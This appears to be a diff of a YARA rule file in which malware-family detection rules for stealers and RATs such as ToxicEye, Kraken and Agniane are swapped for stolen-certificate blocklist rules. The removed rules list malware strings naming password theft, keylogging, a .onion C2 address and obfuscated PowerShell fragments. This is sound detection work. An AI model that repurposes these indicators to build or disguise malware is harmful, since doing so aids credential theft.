 		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.PovertyStealer"
-
-	strings:
-		$x1 = "Poverty is the parent of crime." ascii
-		$s2 = "OperationSystem: %d:%d:%d" ascii
-		$s3 = "ScreenSize: {lWidth=%d, lHeight=%d}" ascii
-		$s4 = "VideoAdapter #%d: %s" ascii
-		$s5 = "$d.log" fullword wide
+		thumbprint = "a7dc8cb973ef5f54af0889549d84dee51a7db839"
+		importance = 20
 
 	condition:
-		(( uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) ) ) or all of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEDIATEK INC." and pe.signatures [ i ] . serial == "56:f0:08:e6:9a:7c:4c:3f:eb:38:9c:66:ea:f5:82:59" )
 }
-rule DITEKSHEN_MALWARE_Win_Janelarat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_279B3A26F16A069Aa7Bca1811D44Ad9B : FILE
 {
 	meta:
-		description = "Detects JanelaRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6a49eeda-307f-5429-aa24-658223360239"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "3ead1500-d510-5a9b-8a19-19f9f7f2cf95"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10919-L10939"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4857-L4873"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9f10112b6ffa382b03511e7b6c8757438d5910ee2c24d650d05bb53abfff3860"
+		logic_hash = "5a01fd3db421a4b41318fa1264e8bc621ddeddb44b82b8f0b15e97eccec616e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "<Janela>k__" ascii
-		$x2 = "janela" fullword ascii
-		$x3 = "\\CSHARP\\RAT\\" ascii
-		$s1 = "<SystemInfos>k__" ascii
-		$s2 = "<SendKeepAlives>b__" ascii
-		$s3 = "hookStruct" fullword ascii
-		$s4 = "[^a-zA-Z]" fullword wide
-		$s5 = "GetRecycled" fullword ascii
-		$s6 = "import \"bcl.proto\";" wide
-		$s7 = "\\KL_FINAL\\" ascii
-		$s8 = "\\KL_FASEAVAST" ascii
-		$s9 = "\\kl c++" ascii
-		$s10 = "VisaoAPP" ascii wide
+		thumbprint = "4a9fc15f1d63145b622989c4f5bec4612095401e"
+		hash1 = "fc642048d9f0b8cb36649fd377fdb68dce3998f2a88e8c64acdc4e88435f2562"
+		hash2 = "914067034336e4ed8b56e66d6be29f34477d9fb38ba73095a3edca5ec9cb1a9c"
+		hash3 = "daf7e148f82807808cac8a21b1a3ce43491c3a140420442a1c1ee2d497a9e0a2"
+		hash4 = "3727044bebe4a14aed66df5119c11471a57b50c57ab4baaef4073323206d3b9b"
+		hash5 = "f0239d16f77b11e6b606b23a53c9e563f6360a27a03c0b9cf83b151ee8ee9088"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or ( 6 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIGITAL DEVLIN LIMITED" and pe.signatures [ i ] . serial == "27:9b:3a:26:f1:6a:06:9a:a7:bc:a1:81:1d:44:ad:9b" )
 }
-rule DITEKSHEN_MALWARE_Win_Qwixxrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_07Cef66A71C35Bc3Aed6D100C6493863 : FILE
 {
 	meta:
-		description = "Detects QwixxRAT. Uses ToxicEye / TelegramRAT as base (MALWARE_Win_TelegramRAT)"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0a8f2f6f-aa78-56c2-aca0-d575fbf0b91e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e07b0a2c-64ff-5e12-9f19-00a67a13fb89"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10941-L10953"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4875-L4886"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e6e44697e393da35215f7835f122cb74b05dbeebb558345d5110d6fbc809f4dd"
+		logic_hash = "24b89e65bc9d60a60e57f749735214c462e56c3194906e4bca52d74463617be4"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = /Qwixx(\s)?Stealer/ ascii wide
-		$s2 = "discord.gg/UXVFHzTjYe" wide
-		$s3 = "t.me/QwixxTwixx" wide
-		$s4 = "Secret Qwixx" wide
-		$s5 = "\\Qwixx Rat\\" ascii
+		thumbprint = "9f65b1f0bed6e58ecdcc30b81b08b350fcc966a1"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fubon Technologies Ltd" and pe.signatures [ i ] . serial == "07:ce:f6:6a:71:c3:5b:c3:ae:d6:d1:00:c6:49:38:63" )
 }
-rule DITEKSHEN_MALWARE_Win_Toxiceye : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D3356318924C8C42959Bf1D1574E6482 : FILE
 {
 	meta:
-		description = "Detects ToxicEye / TelegramRAT. Observed used as the basis for many infostealers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "99304f11-2444-5864-b174-514bb5bef0f7"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7e23e9cf-5a34-55bb-a88d-4c0aef411372"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10955-L10973"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4888-L4899"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ee01c107dd295b923801c0d1a77b1534d3a5f2abf8d2cfa93c6786a1b0553504"
+		logic_hash = "86ca8da7e9e704f64be8ecd9e270108337d28b540ba8cd669a8d536ccfefea95"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "[~] Handling command" wide
-		$s2 = "[?] Sleeping {0}" wide
-		$s3 = "GETPASSWORDS" wide
-		$s4 = "FORKBOMB" wide
-		$s5 = "SENDKEYPRESS" wide
-		$s6 = "KEYLOGGER" wide
-		$s7 = "/ToxicEye/master/TelegramRAT/" wide
-		$s8 = "desktopScreenshot" ascii
-		$s9 = "MeltFile" ascii
-		$s10 = "AutoStealer" ascii
-		$s11 = /\/LimerBoy\/(ToxicEye|Adamantium-Thief|hackpy)/ wide
+		thumbprint = "e21f261f5cf7c2856bd9da5a5ed2c4e2b2ef4c9a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADV TOURS d.o.o." and pe.signatures [ i ] . serial == "00:d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" )
 }
-rule DITEKSHEN_MALWARE_Win_Rdpcredsstealerinjector : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_038Fc745523B41B40D653B83Aa381B80 : FILE
 {
 	meta:
-		description = "Detects RDP Credentials Stealer injector"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "221b7d64-6585-5f3a-bffa-bde05390db73"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "ed7581eb-52e7-5216-86a2-079bc5741b05"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10994-L11007"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4901-L4912"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0dfade8dde987f5134158b7c4abc3eaf8dcece86e1ff2ab1da4466da316939a2"
+		logic_hash = "b760525c38610b8a5cc990335122eab81cb895dc523908ef841c5c3117a1a372"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.RDPCredsStealer-Injector"
-
-	strings:
-		$s1 = "\\APIHookInjectorBin\\" ascii
-		$s2 = "\\RDPCredsStealerDLL.dll" ascii
-		$s3 = "DLL Injected" ascii
-		$s4 = "Code Injected" ascii
-		$s5 = /(OpenProcess|VirtualAllocEx|CreateRemoteThread)\(\) failed:/ fullword ascii
+		thumbprint = "05124a4a385b4b2d7a9b58d1c3ad7f2a84e7b0af"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Optima" and pe.signatures [ i ] . serial == "03:8f:c7:45:52:3b:41:b4:0d:65:3b:83:aa:38:1b:80" )
 }
-rule DITEKSHEN_MALWARE_Win_Krakenstealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ac0A7B9420B369Af3Ddb748385B981 : FILE
 {
 	meta:
-		description = "Detect Kraken infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "460eb574-99c9-5f78-9efa-7a8808aaaae7"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0935fd31-3d8f-57d2-a00e-ad7d5cdbe12d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11009-L11030"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4914-L4925"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7f15823db706e6e51d8ea58fb026efb49f42234255d2f448614dc645d12648bb"
+		logic_hash = "47dca0d0b84dd0d210cf7fdda3bcce796d090e5de3f4266bbed01eebdd397bfa"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		snort = "923828002"
-
-	strings:
-		$x1 = /Kraken(_)?(Stub|Keyboard|Clipboard|GeneratorMachine|PostLogs|Screenshot|Keylogs|Password)/ ascii wide
-		$s1 = /(get|set)_(Clipboard|Keyboard|Screen)Recorder/ fullword ascii
-		$s2 = /Dumping(FileZilla|360_China|Opera|Epic|CocCoc|Thunderbird|Brave)/ fullword ascii
-		$s3 = "ScreenPostData" fullword ascii
-		$s4 = "encrypt_data" fullword ascii
-		$s5 = "KeyboardProc" fullword ascii
-		$s6 = "UploadsKeyboard" fullword ascii
-		$s7 = "ClpUploader" fullword ascii
-		$s8 = "StartKeylogger" fullword ascii
-		$s9 = "ClipoDetectedRemover" fullword ascii
-		$s10 = "Disable_Regis" fullword ascii
-		$s11 = "RecordedClips" fullword ascii
-		$s12 = "HoneyPotStatus" fullword ascii
+		thumbprint = "15b56f8b0b22dbc7c08c00d47ee06b04fa7df5fe"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or 9 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Tochka" and pe.signatures [ i ] . serial == "00:ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" )
 }
-rule DITEKSHEN_MALWARE_Win_Whiffyrecon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00913Ba16962Cd7Eee25965A6D0Eeffa10 : FILE
 {
 	meta:
-		description = "Detects Whiffy Recon"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "19b0f327-06ee-5f78-abac-9c4fbcad98ac"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7a053089-44c8-5f30-8eee-dcd4ba24efe8"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11032-L11052"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4927-L4938"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "58df9f47f5890c5e31d352be682c6164a940dad206ad29c54c43f70d3afb9543"
+		logic_hash = "a2e729c053d1a9d5895dc2247ea0804525f8f1744875d5c2f96b4255ad325dc5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "WLANSVC" fullword wide
-		$s2 = "f02fe1c0-137a-4802-8881-55dd300c5022" fullword wide
-		$s3 = "\\wlan.lnk" fullword wide
-		$s4 = "str-12.bin" wide
-		$s5 = "/geolocation/v1/geolocate?key=" wide
-		$s6 = "/wlan" fullword wide
-		$s7 = "/scanned" fullword wide
-		$s8 = "/bots/" fullword wide
-		$s9 = "wlan.pdb" fullword ascii
-		$s10 = "botId" fullword ascii
-		$s11 = "wifiAccessPoints" fullword ascii
-		$s12 = "considerIp" fullword ascii
-		$s13 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" fullword wide
+		thumbprint = "079aeb295c8e27ac8d9be79c8b0aaf66a0ef15de"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JMT TRADING GROUP INC" and pe.signatures [ i ] . serial == "00:91:3b:a1:69:62:cd:7e:ee:25:96:5a:6d:0e:ef:fa:10" )
 }
-rule DITEKSHEN_MALWARE_Win_Quiterat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_F44A91704F9Ea388446D2635F2A8C8A5 : FILE
 {
 	meta:
-		description = "Detects QuiteRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "54f7b899-3418-5074-8138-38cf073cda8c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "52f08ec1-fb83-59bc-bb90-2ae12245c0f7"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11054-L11068"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4940-L4953"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "257f9151294254e3e86979f184963f0396587438393b11bad068ba0f386cfc4a"
+		logic_hash = "cec66648ecde5b11a2a20674b2e1f10c8b917ebeb26ddba0ead2b6af45c8519b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "< No Pineapple! >" ascii
-		$x2 = ".?AVPineapple" ascii
-		$x3 = ".?AVApple@@" ascii
-		$s1 = "XgsdCwsRFxZF" ascii
-		$s2 = "XggZChkVRQ==" ascii
-		$s3 = "RxUZERQRHEU=" ascii
-		$s4 = "XhkbDBEXFkU" ascii
+		thumbprint = "573514c39bcef5690ab924f9df30577def6e877f"
+		hash1 = "d67dde5621d6de76562bc2812f04f986b441601b088aa936d821c0504eb4f7aa"
+		hash2 = "71f60a985d2cc9fc47c6845a88eea4da19303a96a2ff69daae70276f70dcdae0"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $x* ) and 1 of ( $s* ) ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Binance" and pe.signatures [ i ] . serial == "f4:4a:91:70:4f:9e:a3:88:44:6d:26:35:f2:a8:c8:a5" )
 }
-rule DITEKSHEN_MALWARE_PWSH_CUMII
+
+rule DITEKSHEN_INDICATOR_KB_CERT_029685Cda1C8233D2409A31206F78F9F : FILE
 {
 	meta:
-		description = "Detects multi-dropper PowerShell"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "07b77251-1d79-5521-8c05-ecfc662f45cb"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2c1d858b-3adc-5c05-bc72-2a6f12f7245e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11070-L11086"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4955-L4966"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ab9e59b0552718928d170a988d129b38352700076847f2f409976016858864eb"
+		logic_hash = "a7eec901d92d6126cbc4468d7f2fbccc905f550c7dc8d28b405f583cfde9aea3"
 		score = 75
 		quality = 75
-		tags = ""
-		clamav = "ditekSHen.MALWARE.PWSH.CUMII"
-
-	strings:
-		$s1 = ".('{1}{$}'.replace('$','0')" ascii nocase
-		$s2 = ",'I').replace('!','ex')" ascii nocase
-		$s3 = "'.replace('*','0001')" ascii nocase
-		$s4 = "Remove-Item $" ascii nocase
-		$s5 = "the File will start cumiing" ascii nocase
-		$b1 = "011001100111010101101110011*" ascii
-		$b2 = "0101001000*1110110*010011111" ascii
-		$b3 = "01001101010110101001*11*0000" ascii
+		tags = "FILE"
+		thumbprint = "86574b0ef7fbce15f208bf801866f34c664cf7ce"
+		importance = 20
 
 	condition:
-		(3 of ( $s* ) and 1 of ( $b* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOTO TRADE" and pe.signatures [ i ] . serial == "02:96:85:cd:a1:c8:23:3d:24:09:a3:12:06:f7:8f:9f" )
 }
-rule DITEKSHEN_MALWARE_Win_Agnianestealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Aebe117A13B8Bca21685Df48C74F584D : FILE
 {
 	meta:
-		description = "Detects Agniane infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "fcbbf748-dc01-579f-a6f8-37e0f3dea35e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2b9c40e8-9c0e-523d-b746-4e31d0a780e0"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11088-L11114"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4968-L4979"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0031fbe6d76868819cbcfc638433d60a50e8f5cfd14ff25af88ed3dffefd7d62"
+		logic_hash = "cb17c6f311d88125ad0c790c61fe0dd1ffbdefdbea45ffb54c47da5d98f99900"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		snort = "923828001"
-		clamav = "ditekSHen.MALWARE.Win.AgnianeStealer"
-
-	strings:
-		$x1 = "Agniane.pdb" ascii
-		$x2 = "IEnumerable<Agniane.Classes.LogRecord>." ascii
-		$x3 = "Agniane Stealer" wide
-		$x4 = "cinoshibot" wide
-		$x5 = "yqbiguuno2zp5jxsmqbev4rwckvy27bqws5cgm3hiid7xolt65j72kqd.onion" wide
-		$s1 = "<Pass encoding=\"base64\">" wide
-		$s2 = "Domain Detect: detected {0}" wide
-		$s3 = "DOMAINDETECTCOOKIES" ascii
-		$s4 = /(Opera|Edge|Chrome|Brave|Vivaldi|Blink|Universal|Gecko|OperaGx|Firefox)Grabber/ fullword ascii
-		$u1 = "/antivm.php?id=" wide
-		$u2 = "/ferr.php?id=" wide
-		$u3 = ".php?ownerid=" wide
-		$u4 = "&buildid=" wide
-		$u5 = "&username=" wide
-		$u6 = "&BSSID=" wide
-		$u7 = "&rndtoken=" wide
-		$u8 = "&domaindetects=" wide
+		thumbprint = "4dc9713dfb079fbae4173d342ebeb4efb9b0a4dc"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 3 of ( $u* ) ) ) or ( all of ( $s* ) and 3 of ( $u* ) ) or ( 7 of ( $u* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NANAX d.o.o." and pe.signatures [ i ] . serial == "00:ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" )
 }
-rule DITEKSHEN_MALWARE_Win_TOITOIN_Kritaloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_38989Ec61Ecdb7391Ff5647F7D58Ad18 : FILE
 {
 	meta:
-		description = "Detects TOITOIN KritaLoader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5ff002fc-1108-554e-9de6-92d568826d1d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "40c742ec-f683-57fe-bb35-7c44617f9199"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11116-L11127"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4981-L4992"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9629a4cfa606812d2579c0c0d486dec5971854e5133f0594a4638db5b89c3135"
+		logic_hash = "f2108c41c814a815047268d9934a01231936a1cf73cbb92476eb96c9fe4b1091"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN"
-
-	strings:
-		$p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii
-		$p2 = "DLL_Start_OK.pdb" ascii
-		$s1 = "krita_main" fullword ascii
+		thumbprint = "71e74a735c72d220aa45e9f1b83f0b867f2da166"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $p* ) and 1 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RotA Games ApS" and pe.signatures [ i ] . serial == "38:98:9e:c6:1e:cd:b7:39:1f:f5:64:7f:7d:58:ad:18" )
 }
-rule DITEKSHEN_MALWARE_Win_TOITOIN_Injectordll : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D08D83Ff118Df3777E371C5C482Cce7B : FILE
 {
 	meta:
-		description = "Detects TOITOIN InjectorDLL"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "40776e0a-29df-52ea-8486-35027ab31a1b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d4857ec5-2c99-51f8-a5b8-938c8d83169e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11129-L11141"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4994-L5005"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fc80c702305657ba1058ca7f55579d1d5254dd0f619c5f7fda7886a868b65c93"
+		logic_hash = "b6c7f5c57c79d11132535bedce77276f67c4f854f5e8ef2c12aced64f8a188d0"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-		clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN"
-
-	strings:
-		$p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii
-		$p2 = "DLL_START_IN.pdb" ascii
-		$s1 = ".ini" fullword ascii
-		$s2 = "\\users\\Public\\Documents\\" fullword ascii
+		thumbprint = "8a1bcf92ea961b8bc8817b0630f34607ccb5bff2"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $p* ) and all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMO-K Limited Liability Company" and pe.signatures [ i ] . serial == "00:d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" )
 }
-rule DITEKSHEN_MALWARE_Win_TOITOIN_Downloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_249E3F1B7595E7D0Fe6Df13303287343 : FILE
 {
 	meta:
-		description = "Detects TOITOIN Downloader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0282ea26-e381-5c9a-9dad-c90246d8add0"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "3f780428-a482-5201-a7ca-d3608779a5e4"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11143-L11154"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5007-L5018"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d7e5e99c9266ec144152c3d1066e0e1a862f48ded17fab8f504192ca48219826"
+		logic_hash = "4df122a53f2c1a08d1694c8e64b802f58507bb985f1aed8c91e6d7ad24906fca"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN"
-
-	strings:
-		$p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii
-		$s1 = { 20 2f 63 20 22 [6-15] 63 00 6d 00 64 00 00 00 6f 00 70 00 65 00 6e }
-		$o1 = { 48 83 fa 10 72 34 48 8b 8d 10 ?? 00 00 48 ff c2 }
+		thumbprint = "8e99b2786f59e543d1f3d02d140e35342c55c18a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "gsLPuSUgRZueWihiZHqYBriNSQqS" and pe.signatures [ i ] . serial == "24:9e:3f:1b:75:95:e7:d0:fe:6d:f1:33:03:28:73:43" )
 }
-rule DITEKSHEN_MALWARE_Win_Venomrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_31D852F5Fca1A5966B5Ed08A14825C54 : FILE
 {
 	meta:
-		description = "Detects VenomRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "93cd5ae3-c222-51a2-bbb9-bdd3254006e5"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8d65caa2-ce28-5f9b-b8a5-3fe903dd5628"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11156-L11170"
